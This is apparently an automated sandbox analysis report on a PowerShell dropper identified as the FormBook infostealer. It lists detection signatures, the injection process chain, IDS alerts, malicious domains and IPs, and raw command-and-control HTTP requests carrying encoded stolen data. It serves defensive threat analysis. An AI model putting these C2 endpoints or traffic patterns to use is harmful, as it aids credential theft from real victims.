Windows Analysis Report
LLLLLLLLASSSEERRRR.ps1

Overview

General Information

Sample name: LLLLLLLLASSSEERRRR.ps1
Analysis ID: 1615024
MD5: 48ad8b6a207ff9dd09d652e96d1126e3
SHA1: d8f92da428011292f8565e88bbe70410809f6462
SHA256: c3201db81449ee8d250a922e98847c0465f85bc6dfd95045c731b02925f835d1
Tags: 196-251-92-64, ps1, user-JAMESWT_MHT

Detection

FormBook
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
PE file contains section with special chars
PE file has nameless sections
Performs DNS queries to domains with low reputation
Powershell drops PE file
Queues an APC in another process (thread injection)
Suspicious execution chain found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 7352 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\LLLLLLLLASSSEERRRR.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • x.exe (PID: 7616 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: E6BB2F3D369794262E51FC97BA9672E9)
      • RegAsm.exe (PID: 7668 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • y85te3vqfc6QGAKyw78l.exe (PID: 2772 cmdline: "C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\ybvre74SC.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • runonce.exe (PID: 8028 cmdline: "C:\Windows\SysWOW64\runonce.exe" MD5: 9E16655119DDE1B24A741C4FD4AD08FC)
            • y85te3vqfc6QGAKyw78l.exe (PID: 1604 cmdline: "C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\LN17FRKCEk.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
            • firefox.exe (PID: 5464 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • notepad.exe (PID: 7552 cmdline: "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\LLLLLLLLASSSEERRRR.ps1" MD5: 27F71B12CB585541885A31BE22F61C83)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000A.00000002.2613383446.0000000004F30000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.1835704349.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000A.00000002.2613236980.0000000004EE0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000D.00000002.2612552379.00000000013C0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.1836454389.0000000002BB0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
5.2.RegAsm.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
5.2.RegAsm.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

System Summary

Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\LLLLLLLLASSSEERRRR.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\LLLLLLLLASSSEERRRR.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5568, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\LLLLLLLLASSSEERRRR.ps1", ProcessId: 7352, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\LLLLLLLLASSSEERRRR.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\LLLLLLLLASSSEERRRR.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5568, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\LLLLLLLLASSSEERRRR.ps1", ProcessId: 7352, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-14T12:37:22.233047+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 59019 | 162.218.30.235 | 80 | TCP
2025-02-14T12:37:46.281283+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 59023 | 103.106.67.112 | 80 | TCP
2025-02-14T12:37:59.838826+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 59027 | 104.21.48.1 | 80 | TCP
2025-02-14T12:38:13.481500+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 59031 | 104.21.112.1 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-14T12:37:38.303274+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 59020 | 103.106.67.112 | 80 | TCP
2025-02-14T12:37:40.857309+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 59021 | 103.106.67.112 | 80 | TCP
2025-02-14T12:37:43.403146+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 59022 | 103.106.67.112 | 80 | TCP
2025-02-14T12:37:52.844518+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 59024 | 104.21.48.1 | 80 | TCP
2025-02-14T12:37:54.609147+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 59025 | 104.21.48.1 | 80 | TCP
2025-02-14T12:37:57.281454+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 59026 | 104.21.48.1 | 80 | TCP
2025-02-14T12:38:05.620076+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 59028 | 104.21.112.1 | 80 | TCP
2025-02-14T12:38:08.157473+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 59029 | 104.21.112.1 | 80 | TCP
2025-02-14T12:38:10.771982+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 59030 | 104.21.112.1 | 80 | TCP
2025-02-14T12:38:19.829823+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 59032 | 134.122.135.48 | 80 | TCP
2025-02-14T12:38:22.481853+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 59033 | 134.122.135.48 | 80 | TCP
2025-02-14T12:38:25.219377+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 59034 | 134.122.135.48 | 80 | TCP

AV Detection

Source: http://www.tumbetgirislinki.fit/k566/ | Avira URL Cloud: Label: malware
Source: http://www.seasay.xyz/c9ts/ | Avira URL Cloud: Label: malware
Source: http://www.lucynoel6465.shop/jgkl/ | Avira URL Cloud: Label: malware
Source: http://www.kjuw.party/e0jv/ | Avira URL Cloud: Label: malware
Source: https://www.seasay.xyz/c9ts/?ddE=b2h4705j/BXuiRKtB3JtAMBCvYzPFBfMqHSZnAN25/qy/QtrNwJS7WfSSjTsExAyaJn | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\x.exe | Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\Temp\x.exe | ReversingLabs: Detection: 61%
Source: LLLLLLLLASSSEERRRR.ps1 | ReversingLabs: Detection: 24%
Source: Yara match | File source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000002.2613383446.0000000004F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1835704349.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2613236980.0000000004EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2612552379.00000000013C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1836454389.0000000002BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2602590342.0000000003250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1838271008.0000000003020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2613263682.0000000002620000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Binary string: runonce.pdbGCTL source: y85te3vqfc6QGAKyw78l.exe, 00000009.00000002.2608539411.000000000085E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000005.00000002.1836620489.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000A.00000003.1838270102.000000000509F000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000A.00000002.2614142025.0000000005250000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000A.00000002.2614142025.00000000053EE000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000A.00000003.1835974299.0000000004EE5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000005.00000002.1836620489.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, runonce.exe, 0000000A.00000003.1838270102.000000000509F000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000A.00000002.2614142025.0000000005250000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000A.00000002.2614142025.00000000053EE000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000A.00000003.1835974299.0000000004EE5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: runonce.pdb source: y85te3vqfc6QGAKyw78l.exe, 00000009.00000002.2608539411.000000000085E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: VZXCSD.pdb source: powershell.exe, 00000000.00000002.1362764872.000000000633A000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000000.1344241466.00000000003FE000.00000002.00000001.01000000.0000000A.sdmp, x.exe.0.dr
Source: Binary string: VZXCSD.pdbX source: powershell.exe, 00000000.00000002.1362764872.000000000633A000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000000.1344241466.00000000003FE000.00000002.00000001.01000000.0000000A.sdmp, x.exe.0.dr
Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: y85te3vqfc6QGAKyw78l.exe, 00000009.00000000.1756318795.000000000012F000.00000002.00000001.01000000.0000000B.sdmp, y85te3vqfc6QGAKyw78l.exe, 0000000D.00000002.2602571364.000000000012F000.00000002.00000001.01000000.0000000B.sdmp
Source: C:\Windows\SysWOW64\runonce.exe | Code function: 10_2_0326C8D0 FindFirstFileW,FindNextFileW,FindClose, | 10_2_0326C8D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user

Software Vulnerabilities

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\SysWOW64\runonce.exe | Code function: 4x nop then xor eax, eax | 10_2_03259EF0
Source: C:\Windows\SysWOW64\runonce.exe | Code function: 4x nop then mov ebx, 00000004h | 10_2_050304E8

Networking

Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:59027 -> 104.21.48.1:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:59022 -> 103.106.67.112:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:59020 -> 103.106.67.112:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:59019 -> 162.218.30.235:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:59025 -> 104.21.48.1:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:59029 -> 104.21.112.1:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:59021 -> 103.106.67.112:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:59031 -> 104.21.112.1:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:59024 -> 104.21.48.1:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:59032 -> 134.122.135.48:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:59023 -> 103.106.67.112:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:59030 -> 104.21.112.1:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:59028 -> 104.21.112.1:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:59034 -> 134.122.135.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:59033 -> 134.122.135.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:59026 -> 104.21.48.1:80
Source: DNS query: www.l63339.xyz
Source: DNS query: www.seasay.xyz
Source: global traffic | TCP traffic: 192.168.2.9:58925 -> 162.159.36.2:53
Source: Joe Sandbox View | IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View | IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View | IP Address: 103.106.67.112 103.106.67.112
Source: Joe Sandbox View | IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View | IP Address: 104.21.112.1 104.21.112.1
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected:
    GET /vhr7/?uxPH=qD4HNfCp70&ddE=iaSfD1StI7hDT4qIAMii2AJAHOe0qHDn7gYmLjmbAGxKTACTDmsoqhtbBCAt1Ym3ncJClzXtgr7Snspij9c4o2GNlbdMtrDimVv8q0bADTP2MW58ag== HTTP/1.1
    Host: www.l63339.xyz
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.5
    Connection: close
    User-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
Source: global traffic | HTTP traffic detected:
    GET /c9ts/?ddE=b2h4705j/BXuiRKtB3JtAMBCvYzPFBfMqHSZnAN25/qy/QtrNwJS7WfSSjTsExAyaJnRUVMUOnSQnGJ4mxt7UxshhdjBGkpYiovfB8EVbaaI8Ibdvw==&uxPH=qD4HNfCp70 HTTP/1.1
    Host: www.seasay.xyz
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.5
    Connection: close
    User-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
Source: global traffic | HTTP traffic detected:
    GET /k566/?uxPH=qD4HNfCp70&ddE=RARW43WNMKajmHoYlEtIRJLMiezSzeuXvXreCHJ6fEp5jkldk9mcWmm/U2k918FOdcoJ/x5nnQwLxIae2MHe6OYJ2CZYvza1X4jE5qPwznFDfci4lg== HTTP/1.1
    Host: www.tumbetgirislinki.fit
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.5
    Connection: close
    User-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
Source: global traffic | HTTP traffic detected:
    GET /jgkl/?ddE=hI+cEEoDMRK5HtHlz4V8IEOzbfVROUzo+nuR9x41ri89hVkyLZ4bVRvwmPB4YpqMZl4/b+D+8qc7dcfD2Dlpe8No0hPfAwO5oFY7qBV6wzFyOtp6qA==&uxPH=qD4HNfCp70 HTTP/1.1
    Host: www.lucynoel6465.shop
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.5
    Connection: close
    User-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5
Source: global traffic | DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
Source: global traffic | DNS traffic detected: DNS query: www.l63339.xyz
Source: global traffic | DNS traffic detected: DNS query: www.seasay.xyz
Source: global traffic | DNS traffic detected: DNS query: www.tumbetgirislinki.fit
Source: global traffic | DNS traffic detected: DNS query: www.lucynoel6465.shop
Source: global traffic | DNS traffic detected: DNS query: www.kjuw.party
                Source: unknownHTTP traffic detected: POST /c9ts/ HTTP/1.1Host: www.seasay.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateOrigin: http://www.seasay.xyzReferer: http://www.seasay.xyz/c9ts/Content-Length: 192Cache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5Data Raw: 64 64 45 3d 57 30 4a 59 34 44 6c 67 38 7a 6d 57 35 46 36 57 58 32 78 58 4d 50 49 78 69 4a 75 36 49 52 48 59 6e 55 4c 6b 7a 41 74 66 75 65 4b 75 72 51 35 70 50 52 74 73 32 58 79 46 63 6c 75 6f 49 52 59 54 59 4b 44 4b 54 43 74 31 59 32 2f 49 30 47 63 49 70 45 34 70 57 54 45 55 36 4b 7a 67 50 58 5a 69 6f 64 6d 78 4c 71 6f 66 58 49 2b 4c 37 36 62 4b 35 66 52 48 31 69 32 65 45 32 57 75 44 59 42 30 36 32 51 56 2f 32 4d 73 62 32 48 6b 75 32 32 5a 47 36 32 51 35 4f 2b 50 30 55 43 61 74 4b 43 4f 30 4e 36 54 63 47 31 6d 74 42 6d 38 77 75 39 44 2b 79 52 2b 56 7a 4e 70 66 38 65 37 Data Ascii: ddE=W0JY4Dlg8zmW5F6WX2xXMPIxiJu6IRHYnULkzAtfueKurQ5pPRts2XyFcluoIRYTYKDKTCt1Y2/I0GcIpE4pWTEU6KzgPXZiodmxLqofXI+L76bK5fRH1i2eE2WuDYB062QV/2Msb2Hku22ZG62Q5O+P0UCatKCO0N6TcG1mtBm8wu9D+yR+VzNpf8e7
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Feb 2025 11:37:54 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LW0oLJBvAKwPhNb%2FPpFAXdgW8Fw84NTfg%2B%2F3qfAo29W2xtn3zLKXB3uM7VdZrEUgjXYNT28%2Fl6D3tIWgf2%2BWG4Ch32O3FfnSB%2FvjxKEC5Ch3tAQ3sHXuRncAGG15sT9LrtrLX52Mk2ya7wc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 911cc4d23a2a7c94-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1782&min_rtt=1782&rtt_var=891&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=839&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 30 32 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a 59 93 a3 48 92 7e ef 5f a1 ad b5 35 9b 31 2a 87 fb ca ae 6a 5b 6e 90 04 02 04 08 f4 c6 0d e2 14 b7 34 36 ff 7d 4d 99 d5 d5 59 59 52 75 f5 ce 3e 6c bc 88 20 dc 3d c2 af cf 43 11 fc f2 cb 2f 9f fe 83 df 71 96 a7 0b ab 6c a8 ca df 7e f9 f4 fa b3 5a ad 56 9f b2 d8 8f be 3c 56 f1 e0 af b2 61 68 9f e2 f3 98 4f 9f 3f 70 4d 3d c4 f5 f0 34 5c da f8 c3 2a 7c ed 7d fe 30 c4 cb 00 de 44 fc ba 0a 33 bf eb e3 e1 f3 38 24 4f d4 87 87 72 fc 30 8b 9f 6e fc 5d 53 be 11 54 37 4f e1 6d e8 21 a3 de f9 69 e5 ff 15 0e 61 69 f3 2e ee df b0 40 df d0 d6 7e 15 7f fe 30 e5 f1 dc 36 dd f0 86 6c ce a3 21 fb 1c c5 53 1e c6 4f 2f 9d 8f ab bc ce 87 dc 2f 9f fa d0 2f e3 cf f0 3f be 8a 1a f2 a1 8c 7f c3 20 6c a5 35 c3 4a 6c c6 3a fa 04 be be 7c 25 e8 87 4b 19 af 6e 76 fb 62 ae b0 ef bf 30 df 5a d0 44 97 d5 3f bf 76 6f 2d 69 ea e1 29 f1 ab bc bc 3c af 98 2e f7 cb 8f 2b 39 2e a7 78 c8 43 ff e3 aa f7 eb fe a9 8f bb 3c f9 f5 7b b6 3e bf c6 cf 2b 18 6b 97 6f 07 cb bc 8e 9f b2 38 4f b3 e1 79 05 ff 03 43 Data Ascii: 102dZYH~_51*j[n46}MYYRu>l 
=C/ql~ZV<VahO?pM=4\*|}0D38$Or0n]ST7Om!iai.@~06l!SO///? l5Jl:|%Knvb0ZD?vo-i)<.+9.xC<{>+ko8OyC
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Feb 2025 11:37:57 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X6bW4OnaLd%2FWD21cnxWtYZeArMKWBgBrg6oianpWAv38cclKZXlXppwIlQD7TEJbVIgdKf%2FGN4agKcPjDIqUIK%2FM2qrFyJ%2FWNeloUcOIwqnywwnblH8ieG8H6522HcdXMCXX9%2Be68fcGVpY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 911cc4e2dccf1a24-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1887&min_rtt=1887&rtt_var=943&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1852&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 31 32 66 62 0d 0a cc 5a 59 97 a3 4a 72 7e bf bf 42 ae 39 b6 67 0e 5d cd be d5 ad 6a 1b 10 12 48 02 01 12 92 d0 cb 3d 09 24 8b 58 c5 2e f9 cc 0f f2 df f0 2f f3 51 55 2f d5 55 52 77 df 19 3f 38 1f 4a 64 66 44 64 64 2c 5f 50 99 fc f6 db 6f 8f ff 32 5e 4a 6b c7 90 47 51 93 a5 9f 7e 7b 7c f9 19 8d 46 a3 c7 08 02 ff f3 63 06 1b 30 8a 9a a6 bc 87 c7 36 ee 9e ee a4 22 6f 60 de dc 37 a7 12 de 8d bc 97 de d3 5d 03 87 06 bd 88 f8 7d e4 45 a0 aa 61 f3 d4 36 c1 3d 77 77 53 0e f0 22 78 7f e1 af 8a f4 95 a0 bc b8 f7 2e 53 37 19 8d 0a 84 19 f8 33 1c f2 50 c6 15 